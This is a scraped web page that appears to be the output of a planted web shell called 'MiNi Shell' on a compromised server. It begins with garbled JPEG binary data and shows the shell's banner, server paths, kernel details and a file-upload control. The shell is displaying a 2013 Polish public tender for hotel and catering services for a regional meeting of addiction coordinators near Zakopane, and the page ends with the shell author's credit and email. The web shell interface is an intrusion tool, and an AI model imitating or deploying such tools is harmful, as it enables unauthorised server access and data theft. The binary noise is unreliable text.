JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130403/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130403/129902-N-2013.html

<p class="kh_header"><b>Kraków: Usługi hotelarskie i restauracyjne na potrzeby realizacji 2 dniowej Narady Gminnych Pełnomocników ds. Uzależnień z terenu Województwa Małopolskiego w dniach 24 i 25 kwietnia 2013 roku w hotelu w granicach administracyjnych gminy Bukowina Tatrzańska lub gminy Poronin lub gminy Zakopane lub miasta Zakopane</b><br>
<b>Numer ogłoszenia: 129902 - 2013; data zamieszczenia: 03.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Małopolskie , ul. Basztowa 22, 31-156 Kraków, woj. małopolskie, tel. 012 4300394, 6303408,6303122, faks 012 6160144,6303126.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.malopolskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi hotelarskie i restauracyjne na potrzeby realizacji 2 dniowej Narady Gminnych Pełnomocników ds. Uzależnień z terenu Województwa Małopolskiego w dniach 24 i 25 kwietnia 2013 roku w hotelu w granicach administracyjnych gminy Bukowina Tatrzańska lub gminy Poronin lub gminy Zakopane lub miasta Zakopane.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi hotelarskiej w trakcie organizacji II Narady Pełnomocników ds. Uzależnień powołanych przez Wójtów Burmistrzów, Prezydentów Miast z terenu Województwa Małopolskiego do realizacji celów gminnych programów profilaktyki i rozwiązywania problemów alkoholowych oraz przeciwdziałania narkomanii obejmującej zakup miejsc noclegowych wraz ze śniadaniem dla wykładowców, wynajem sali konferencyjnej wraz z wyposażeniem oraz usługi restauracyjnej obejmującej przygotowanie oraz podanie posiłków w trakcie trwania narady tj. przerwa kawowa, obiad oraz kolacja w stylu regionalnym dla uczestników oraz wykładowców w dniach 24 i 25 kwietnia 2013 roku w jednym z hoteli w granicach administracyjnych gminy Bukowina Tatrzańska lub gminy Poronin lub gminy Zakopane lub miasta Zakopane. 
Zamówienie składa się z: 1.Usługi noclegowej w dniu 24 kwietnia 2013 r. /jeden nocleg/ przy zapewnieniu 2 dwuosobowych pokojów oraz 5 jednoosobowych pokojów dla 9 osób, w tym wykładowców narady. W cenę pokoju wliczone musi być śniadanie hotelowe w dniu 25 kwietnia 2013 r. dla 9 osób.
W przypadku 2 pokoi jednoosobowych Zamawiający może zgłosić najpóźniej do dnia 22 kwietnia 2013 roku konieczność dostawienia dodatkowego łóżka w pokoju, za co nie przysługuje Wykonawcy dodatkowe wynagrodzenie, Rezerwacji dodatkowych 22 pokojów dwuosobowych w dniu 24 kwietnia 2013 r /jeden nocleg/ dla uczestników, którzy wyrażą chęć skorzystania z pokoju, przy czym koszty noclegu pokryją indywidualnie. Cena noclegu w pokoju dwuosobowym dla uczestników ma być taka sama jak dla pokoju dwuosobowego opłacanego przez Zamawiającego. Śniadanie hotelowe ma być wliczone w cenę noclegu., w obiekcie spełniającym następujące wymogi: obiekt hotelarski znajdujący się w granicach administracyjnych gminy Bukowina Tatrzańska lub gminy Poronin lub gminy Zakopane lub miasta Zakopane, wobec którego marszałek województwa wydał decyzję o zaszeregowaniu obiektu do rodzaju hoteli w rozumieniu ustawy z dnia 29 sierpnia 1997 r. o usługach turystycznych /Dz. U z 2004, nr 223, poz. 2268 z późn. zm./ oraz nadał kategorię zgodnie z ww. ustawą. Standard obiektu nie niższy niż dla hoteli zaszeregowanych do kategorii 3 gwiazdki, obiekt dostosowany do potrzeb osób niepełnosprawnych obiekt musi spełniać co najmniej minimalne wymagania w zakresie dostosowania obiektów do potrzeb osób niepełnosprawnych określone w Załączniku nr 8 do Rozporządzenia Ministra Gospodarki i Pracy z dnia 19 sierpnia 2004 r. w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie /Dz. U. z 2006 r. Nr 22, poz. 169/, szczególnie w zakresie dostępu do sali wykładowej oraz miejsca podawania posiłków, w odległości nie większej niż 500 m od ww. obiektu hotelarskiego musi znajdować się przystanek linii busowych, autobusowych, przy czym: musi on posiadać dogodne bezpośrednie połączenie dojazdowe busowe/ autobusowe z siedziby gminy tj odpowiednio: z miejscowości Bukowina Tatrzańska /dla hotelu z gminy Bukowina Tatrzańska/ lub z miejscowości Poronin /dla hotelu z gminy Poronin/ lub z miejscowości Zakopane /dla hotelu z gminy Zakopane/, musi on posiadać dogodne bezpośrednie połączenie dojazdowe busowe/autobusowe z dworca PKP/PKS w Zakopanem dla hotelu położonego w mieście Zakopane, hotel powinien udostępnić uczestnikom narady możliwość zakwaterowania w pokojach hotelowych od godz. 9.00 w dniu 24 kwietnia 2013 roku, oraz możliwość zwolnienia rezerwacji pokojów hotelowych najpóźniej do godziny 15.30 w dniu 25 kwietnia 2013 roku. W przypadku niemożności udostępnienia pokojów uczestnikom w ww. godzinach hotel musi udostępnić pomieszczenie zamykane na klucz, w którym możliwe będzie pozostawienie bagaży przez osoby, które korzystać będą z noclegu podczas trwania narady. Każdy uczestnik korzystający z noclegu musi zostać poinstruowany, co najmniej słownie, przez obsługę hotelu, o sposobie korzystania z rezerwacji, zasadach korzystania z pokoju hotelowego oraz ostatecznej godzinie zwolnienia pokoju w dniu 25 kwietnia 2013 roku, każdy z pokojów powinien być wyposażony w łazienkę z pełnym węzłem sanitarnym, TV, telefon stacjonarny. Pokoje dwuosobowe muszą być wyposażone w 2 komplety kluczy,przy obiekcie powinien znajdować się parking, z zapewnionymi min. 20 bezpłatnymi miejscami parkingowymi dla pojazdów uczestników narady, usługi restauracyjnej /przygotowanie i podanie posiłków/ w dniu 25 kwietnia 2013 r. obejmującej  śniadanie dla 9 osób bufet gorący - 2 dania gorące do wyboru oraz bufet zimny- wędliny, sery, jajka, dżemy, jogurty naturalne, owocowe, mleko, musli, masło, pieczywo, napoje: kawa i mleczko do kawy, herbata i cytryna do herbaty, woda mineralna, soki owocowe. Usługa restauracyjna /śniadanie/ powinna odbywać się w tym samym miejscu co nocleg. 2. Wynajmu jednej sali wykładowej - w dniach 24 i 25 kwietnia  2013 roku mieszczącej co najmniej 60 osób dostępną w godzinach zgodnych z harmonogramem II Narady Pełnomocników ds. Uzależnień powołanych przez Wójtów Burmistrzów, Prezydentów Miast z terenu Województwa Małopolskiego do realizacji celów gminnych programów profilaktyki i rozwiązywania problemów alkoholowych oraz przeciwdziałania narkomanii,  stanowiącym załącznik nr 1 do wzoru umowy. Sala wykładowa musi znajdować się w tym samym budynku, w którym zakwaterowani będą uczestnicy narady. Sala wykładowa musi być utrzymana w czystości, z dostępem do zaplecza sanitarnego, pozbawiona przedmiotów niezwiązanych ze szkoleniem, z dostępem do światła dziennego oraz możliwością zasłonięcia okien, bez filarów utrudniających kontakt wzrokowy prowadzących z uczestnikami, wyposażona w sprawne ogrzewanie, sprzęt do prowadzenia szkoleń: nagłośnienie, ekran i projektor do wyświetlania multimediów, 1 flipchart z kartkami papieru oraz kompletem markerów, 1 ryzę papieru A4, 1 laptop, dostęp do Internetu. Wymagana jest w hotelu 1 osoba potrzebna do pomocy przy obsłudze technicznej. Sala powinna być wyposażona w krzesła z rozkładaną podkładką umożliwiającą pisanie lub też krzesła i stoły umożliwiające swobodne pisanie na dwóch kartkach A-4, ustawione w układzie szkolnym dla uczestników narady, a także w prezydium dla wykładowców w postaci stołu z miejscami siedzącymi dla 3 osób o powierzchni pozwalającej na równoczesne swobodne umieszczenie na blacie laptopa i swobodne pisanie na dwóch kratkach A-4 na każdym z 3 stanowisk. 3.Usługi restauracyjnej dla uczestników narady, w godzinach zgodnych z harmonogramem narady stanowiącym załącznikiem nr 1 do wzoru umowy, w postaci: obiadu na gorąco w formie bufetowej /serwowanym na siedząco/ w dniu 24 kwietnia 2013 roku dla 60 osób oraz w dniu 25 kwietnia 2013 roku dla 57 osób, zgodnie z poniższym opisem: dwa ciepłe dania mięsne do wyboru  - min. 130g na osobę np. roladki z kurczaka ze szpinakiem, pieczony karczek, schab faszerowany, kurczak marynowany w occie balsamicznym oraz  jedno ciepłe danie wegetariańskie - min 120 g na osobę np. gołąbki jarskie w sosie pieczarkowym, dodatki ziemniaki gotowane lub ziemniaki opiekane lub frytki lub dufinki - min. 100g na osobę, warzywa świeże w formie surówki, warzywa gotowane na parze lub warzywa z patelni - min. 100g na osobę, woda mineralna - 150 ml na osobę, soki - 150 ml na osobę - podane w dzbankach. Przykładowy zestaw: karczek pieczony podany z sosem pieczarkowym 130g na osobę, ziemniaki opiekane - 100g na osobę, warzywa świeże w formie surówki, warzywa gotowane  - 100g na osobę, woda mineralna- 150 ml na osobę, soki - 150 ml na osobę - podane w dzbankach. serwisu kawowego w dniach 24 i 25 kwietnia 2013 roku każdorazowo dla 60 osób w trakcie, którego będzie podawana mieszanka kruchych ciasteczek /co najmniej 3 rodzaje/, w ilości nie mniejszej niż 50g z każdego rodzaju na osobę, ciasto domowe /np. sernik, szarlotka,brownie/ - po min. 2 kawałki na osobę, owoce 3 kg /winogrona, jabłka, banany/, soki owocowe /min. 2 rodzaje/ w ilości nie mniejszej niż 250 ml na osobę, woda mineralna gazowana lub niegazowana podana w butelkach plastikowych o pojemności 500 ml, po 1 szt. na osobę. Ponadto w trakcie całodniowego trwania narady, w tym na wszystkich przerwach, Wykonawca zapewni dostęp do gorącej kawy oraz herbaty w termosach, oraz dodatków: mleko, cukier, cytryna - bez ograniczeń, najlepiej umieszczonych na oddzielnym stole, kolacji w stylu regionalnym w dniu 24 kwietnia 2013 roku dla 60 osób. Styl regionalny oznacza, że Zamawiający wymaga, aby Wykonawca podczas kolacji zapewnił uczestnikom atrakcję regionu w postaci: degustacji tradycyjnych miejscowych potraw regionalnych,  składających się z: przystawki w postaci przekąsek zimnych - min 30 g na osobę, gorącego dania głównego z dodatkami - min.  210 g na osobę, słodkiego deseru  - min. 60 g na osobę, napojów bezalkoholowych - min. 200 ml na osobę tj. kawa, herbata, soki oraz 60 minutowego występu zespołu muzycznego podczas którego zostanie zaprezentowana tradycyjna muzyka regionu lub wystąpienie prelegenta, który zaprezentuje historię regionu, w którym odbywa się narada. Obiad, kolacja oraz serwis kawowy zorganizowane muszą być w innym pomieszczeniu, niż to, w którym organizowana będzie narada, przy czym serwis kawowy zorganizowany musi być w bezpośrednim sąsiedztwie pomieszczenia, w którym organizowana będzie narada. Przedstawiciel Wykonawcy na bieżąco uzupełniać będzie brakujące/wyczerpane składniki serwisu kawowego, zarówno w trakcie trwania przerwy kawowej, jak i po jej zakończeniu, oraz zapewni na każdą przerwę kawową czyste naczynia co najmniej w liczbie odpowiadającej liczbie uczestników w poszczególnych dniach. Szczegółowe menu na każdy dzień realizacji zamówienia, oraz ostateczny plan przebiegu kolacji w stylu regionalnym wymaga akceptacji przedstawiciela Zamawiającego do dnia 22 kwietnia 2013 roku..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.12.00.00-7, 55.30.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.04.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie skonkretyzował opisu sposobu dokonania oceny spełniania dla tego warunku w niniejszym postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie skonkretyzował opisu sposobu dokonania oceny spełniania dla tego warunku w niniejszym postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek udziału w postępowaniu, o którym mowa w art. 22 ust 1 pkt 3 ustawy zostanie uznany za spełniony, gdy Wykonawca wykaże się dysponowaniem w granicach administracyjnych gminy Bukowina Tatrzańska lub gminy Poronin lub gminy Zakopane lub miasta Zakopane hotelem w rozumieniu ustawy z dnia 29 sierpnia 1997 r. o usługach turystycznych (Dz. U z 2004, nr 223, poz. 2268 z późn. zm.) spełniającym następujące wymogi: obiekt hotelarski, wobec którego marszałek województwa wydał decyzję o zaszeregowaniu obiektu do rodzaju hoteli oraz nadał kategorię zgodnie z ww. ustawą, przy czym kategoria oznaczona w gwiazdkach nie może być niższa niż 3 gwiazdki oraz odległość przystanku linii busowych/autobusowych nie może wynosić więcej niż 500 m od hotelu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie skonkretyzował opisu sposobu dokonania oceny spełniania dla tego warunku w niniejszym postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie skonkretyzował opisu sposobu dokonania oceny spełniania dla tego warunku w niniejszym postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wraz z ofertą wykonawca winien złożyć również oświadczenie o spełnieniu przez oferowane usługi, wymagań określonych przez zamawiającego - zał nr 4 do siwz., Wykonawca, wraz ofertą, winien złożyć listę podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów Dz. U. Nr 50, poz. 331, z późn. zm. albo informację o braku przynależności do grupy kapitałowej - zał. nr  7a i  7b do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wrotamalopolski.pl/BIP<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski Województwa Małopolskiego, Departament Zdrowia i Polityki Społecznej, ul. Radziwiłłowska 1, 31-026 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.04.2013 godzina 10:00, miejsce: Urząd Marszałkowski Województwa Małopolskiego, Departament Zdrowia i Polityki Społecznej, ul. Radziwiłłowska 1, 31-026 Kraków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com